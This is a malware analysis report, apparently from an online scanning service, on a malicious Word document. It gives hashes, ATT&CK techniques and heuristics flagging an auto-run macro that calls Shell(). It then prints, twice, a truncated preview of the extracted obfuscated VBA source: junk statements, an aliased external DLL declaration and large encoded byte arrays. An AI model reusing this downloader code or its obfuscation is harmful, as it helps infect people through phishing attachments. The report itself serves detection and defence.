Office (OLE) malware analysis — malicious · e390b688bd3d4525

MALICIOUS

Office (OLE)

284.0 KB Created: 2015-12-16 14:32:00 Authoring application: Microsoft Office Word First seen: 2017-11-29

MD5: 8f6367cf48540a30438c5c76a951829d SHA-1: 1c440f4fd7302ba0b984b6fe76ec30d3dce392f8 SHA-256: e390b688bd3d4525fdd4ed816bebc55e08d5228a683a62056847eb935fd8f306

162 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The file contains VBA macros, specifically a Document_Open macro that utilizes the Shell() function. This indicates an attempt to execute arbitrary code, likely to download and run a secondary payload. The obfuscated VBA code and the use of an external DLL ('WAfnY2e') with an aliased function ('T7CYs9JpQeKYa') suggest a downloader or droppper functionality.

Heuristics 5

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://www.iec.chIn document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 45572 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	45572 bytes
SHA-256: `074da90464abf51c23f7ff945226c40fabe923d1c28997bed084c25f4620b532`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True #If VBA7 Then Private Declare PtrSafe Function KLdP5FaGebJdf Lib "WAfnY2e" Alias "T7CYs9JpQeKYa" (ByVal QuhNED016lne As String, OJkjkgzBzN As Long) As Long #Else Private Declare Function KLdP5FaGebJdf lib "WAfnY2e" Alias "T7CYs9JpQeKYa"(byval QuhNED016lne as String, OJkjkgzBzN as Long ) as Long #End If Dim EFnMW9uqqwMh As String, A4cmLA5fea As Integer Dim A4cmLA5fea1() As Variant, A4cmLA5fea2() As Variant, A4cmLA5fea3() As Variant, A4cmLA5fea4() As Variant, A4cmLA5fea5() As Variant, A4cmLA5fea6() As Variant, A4cmLA5fea7() As Variant, A4cmLA5fea8() As Variant, A4cmLA5fea9() As Variant, A4cmLA5fea10() As Variant Dim A4cmLA5fea11() As Variant, A4cmLA5fea12() As Variant, A4cmLA5fea13() As Variant, A4cmLA5fea14() As Variant, A4cmLA5fea15() As Variant, A4cmLA5fea16() As Variant, A4cmLA5fea17() As Variant, A4cmLA5fea18() As Variant, A4cmLA5fea19() As Variant, A4cmLA5fea20() As Variant Dim A4cmLA5fea21() As Variant, A4cmLA5fea22() As Variant, A4cmLA5fea23() As Variant, A4cmLA5fea24() As Variant, A4cmLA5fea25() As Variant, A4cmLA5fea26() As Variant, A4cmLA5fea27() As Variant, A4cmLA5fea28() As Variant, A4cmLA5fea29() As Variant, A4cmLA5fea30() As Variant, A4cmLA5fea31() As Variant, A4cmLA5fea32() As Variant, A4cmLA5fea33() As Variant, A4cmLA5fea34() As Variant, A4cmLA5fea35() As Variant, A4cmLA5fea36() As Variant Sub LHJwPn() NrSyi8bt999vkR = 71 If Abs(6) = 57 Then OzAJDIA = 7498 Load QHW95ygCCXLKMlehi DateSerial 52, 90, 50 DeleteSetting "Qp4Y8D4vz89Olb" Randomize DyCTQ9UKs03HGVdP = EOF(96) If IsMissing(31) = True Then XwRmTkWR84BfUqAHC = 80 DWcjwawOjsm = CVErr(31) Hour 53 AppActivate 41 HDM9913zDtS = 60 End Sub Function zKK(U6jMo As Integer) As Boolean PdKLCGN = 61 Static HFBwwFtzVi0lGw38q As Byte G7UUZ5FN3z = 78 HFBwwFtzVi0lGw38q = HFBwwFtzVi0lGw38q + 1 OuWaqUF1z = 48 If HFBwwFtzVi0lGw38q = 1 Then Debug.Assert Not zKK(59) AeIBD = 73 zKK = HFBwwFtzVi0lGw38q = 0 Q9dlGz5OfQm = 70 HFBwwFtzVi0lGw38q = 0 QPM3j8cFUa0L = 81 End Function Sub OJwHPvvkNBx() WBJkej = 47 On Error Resume Next B0K8bUdQ = 54 A4cmLA5fea1() = Array(205, 250, 201, 224, 251, 227, 50, 81, 126, 59, 75, 21, 29, 69, 127, 10, 44, 1, 83, 0, 9, 44, 42, 19, 12, 8, 20, 103, 115, 80, 29, 40, 55, 1, 12, 95, 83, 111, 87, 119, 87, 109, 99, 124, 17, 55, 95, 124, 0, 117, 58, 108, 70, 117, 69, 5, 8, 48, 123, 72, 4, 99, 35, 47, 90, 9, 100, 43, 120, 27, 94, 67, 66, 68, 82, 20, 47, 85, 121, 113, 76, 97, 17, 66, 36, 110, 114, 67, 33, 120, 111, 15, 124, 66, 92, 78, 8, 60, 111, 51, 14, 87, 103, 57, 24, 47, 43, 120, 116, 100, 110, 127, 64, 70, 101, 113, 19, 41, 77, 121, 87, 75, 99, 122, 19, 32, 22, 43, 249, 199, 128, 192, 147, 140, 163, 148, 158, 143, 161, 255, 189, 177, 247, 178, 175, 189, 177, 149, 156, 142, 157, 187, 136, 179, 183, 211, 183, 196, 169, 188, 209, 231, 245, 165, 198, 251, 198, 227, 197, 249, 249, 170, 202, 244, 204, 225, 221, 147, 227, 195, 214, 234, 213, 242, 211, 159, 232, 207, 204, 249, 205, 132, 169, 240, 210, 196, 223, 156, 219, 208, 200, 194, 237) VpGcg5LX = 51 A4cmLA5fea2() = Array(189, 204, 199, 246, 225, 171, 156, 154, 204, 227, 229, 226, 226, 161, 255, 209, 220, 194, 211, 204, 139, 153, 167, 199, 170, 250, 231, 130, 225, 140, 187, 184, 248, 158, 167, 250, 247, 205, 181, 224, 183, 196, 191, 135, 163, 248, 168, 124, 109, 110, 1, 101, 89, 1, 40, 21, 94, 14, 52, 35, 35, 108, 95, 92, 24, 126, 71, 21, 14, 124, 60, 0, 73, 5, 37, 38, 7, 19, 95, 91, 8, 29, 0, 196, 165, 221, 255, 200, 166, 60, 22, 9, 58, 32, 12, 94, 12, 50, 38, 105, 43, 115, 22, 33, 111, 39, 10, 46, 88, 48, 49, 84, 14, 108, 85, 53, 19, 11, 15, 22, 108, 57, 42, 22, 53, 4, 61, 14, 112, 65, 126, 87, 101, 75, 117, 17, 109, 9, 127, 35, 6, 4, 26, 18, 104, 3, 1, 39, 94, 84, 77, 72, 6, 54, 15, 59, 108, 117, 97, 94, 22, 125, 16, 53, 68, 54, 6, 4, 70, 36, 29, 90, 74, 119, 31, 119, 37, 107, 11 ... (truncated)

SHA-256: 074da90464abf51c23f7ff945226c40fabe923d1c28997bed084c25f4620b532

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function KLdP5FaGebJdf Lib "WAfnY2e" Alias "T7CYs9JpQeKYa" (ByVal QuhNED016lne As String, OJkjkgzBzN As Long) As Long
#Else
Private Declare Function KLdP5FaGebJdf lib "WAfnY2e" Alias "T7CYs9JpQeKYa"(byval QuhNED016lne as String, OJkjkgzBzN as Long ) as Long
#End If
Dim EFnMW9uqqwMh As String, A4cmLA5fea As Integer
Dim A4cmLA5fea1() As Variant, A4cmLA5fea2() As Variant, A4cmLA5fea3() As Variant, A4cmLA5fea4() As Variant, A4cmLA5fea5() As Variant, A4cmLA5fea6() As Variant, A4cmLA5fea7() As Variant, A4cmLA5fea8() As Variant, A4cmLA5fea9() As Variant, A4cmLA5fea10() As Variant
Dim A4cmLA5fea11() As Variant, A4cmLA5fea12() As Variant, A4cmLA5fea13() As Variant, A4cmLA5fea14() As Variant, A4cmLA5fea15() As Variant, A4cmLA5fea16() As Variant, A4cmLA5fea17() As Variant, A4cmLA5fea18() As Variant, A4cmLA5fea19() As Variant, A4cmLA5fea20() As Variant
Dim A4cmLA5fea21() As Variant, A4cmLA5fea22() As Variant, A4cmLA5fea23() As Variant, A4cmLA5fea24() As Variant, A4cmLA5fea25() As Variant, A4cmLA5fea26() As Variant, A4cmLA5fea27() As Variant, A4cmLA5fea28() As Variant, A4cmLA5fea29() As Variant, A4cmLA5fea30() As Variant, A4cmLA5fea31() As Variant, A4cmLA5fea32() As Variant, A4cmLA5fea33() As Variant, A4cmLA5fea34() As Variant, A4cmLA5fea35() As Variant, A4cmLA5fea36() As Variant
Sub LHJwPn()
NrSyi8bt999vkR = 71
If Abs(6) = 57 Then OzAJDIA = 7498
Load QHW95ygCCXLKMlehi
DateSerial 52, 90, 50
DeleteSetting "Qp4Y8D4vz89Olb"
Randomize
DyCTQ9UKs03HGVdP = EOF(96)
If IsMissing(31) = True Then XwRmTkWR84BfUqAHC = 80
DWcjwawOjsm = CVErr(31)
Hour 53
AppActivate 41
HDM9913zDtS = 60
End Sub
Function zKK(U6jMo As Integer) As Boolean
PdKLCGN = 61
Static HFBwwFtzVi0lGw38q As Byte
G7UUZ5FN3z = 78
HFBwwFtzVi0lGw38q = HFBwwFtzVi0lGw38q + 1
OuWaqUF1z = 48
If HFBwwFtzVi0lGw38q = 1 Then Debug.Assert Not zKK(59)
AeIBD = 73
zKK = HFBwwFtzVi0lGw38q = 0
Q9dlGz5OfQm = 70
HFBwwFtzVi0lGw38q = 0
QPM3j8cFUa0L = 81
End Function
Sub OJwHPvvkNBx()
WBJkej = 47
On Error Resume Next
B0K8bUdQ = 54
A4cmLA5fea1() = Array(205, 250, 201, 224, 251, 227, 50, 81, 126, 59, 75, 21, 29, 69, 127, 10, 44, 1, 83, 0, 9, 44, 42, 19, 12, 8, 20, 103, 115, 80, 29, 40, 55, 1, 12, 95, 83, 111, 87, 119, 87, 109, 99, 124, 17, 55, 95, 124, 0, 117, 58, 108, 70, 117, 69, 5, 8, 48, 123, 72, 4, 99, 35, 47, 90, 9, 100, 43, 120, 27, 94, 67, 66, 68, 82, 20, 47, 85, 121, 113, 76, 97, 17, 66, 36, 110, 114, 67, 33, 120, 111, 15, 124, 66, 92, 78, 8, 60, 111, 51, 14, 87, 103, 57, 24, 47, 43, 120, 116, 100, 110, 127, 64, 70, 101, 113, 19, 41, 77, 121, 87, 75, 99, 122, 19, 32, 22, 43, 249, 199, 128, 192, 147, 140, 163, 148, 158, 143, 161, 255, 189, 177, 247, 178, 175, 189, 177, 149, 156, 142, 157, 187, 136, 179, 183, 211, 183, 196, 169, 188, 209, 231, 245, 165, 198, 251, 198, 227, 197, 249, 249, 170, 202, 244, 204, 225, 221, 147, 227, 195, 214, 234, 213, 242, 211, 159, 232, 207, 204, 249, 205, 132, 169, 240, 210, 196, 223, 156, 219, 208, 200, 194, 237)
VpGcg5LX = 51
A4cmLA5fea2() = Array(189, 204, 199, 246, 225, 171, 156, 154, 204, 227, 229, 226, 226, 161, 255, 209, 220, 194, 211, 204, 139, 153, 167, 199, 170, 250, 231, 130, 225, 140, 187, 184, 248, 158, 167, 250, 247, 205, 181, 224, 183, 196, 191, 135, 163, 248, 168, 124, 109, 110, 1, 101, 89, 1, 40, 21, 94, 14, 52, 35, 35, 108, 95, 92, 24, 126, 71, 21, 14, 124, 60, 0, 73, 5, 37, 38, 7, 19, 95, 91, 8, 29, 0, 196, 165, 221, 255, 200, 166, 60, 22, 9, 58, 32, 12, 94, 12, 50, 38, 105, 43, 115, 22, 33, 111, 39, 10, 46, 88, 48, 49, 84, 14, 108, 85, 53, 19, 11, 15, 22, 108, 57, 42, 22, 53, 4, 61, 14, 112, 65, 126, 87, 101, 75, 117, 17, 109, 9, 127, 35, 6, 4, 26, 18, 104, 3, 1, 39, 94, 84, 77, 72, 6, 54, 15, 59, 108, 117, 97, 94, 22, 125, 16, 53, 68, 54, 6, 4, 70, 36, 29, 90, 74, 119, 31, 119, 37, 107, 11
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.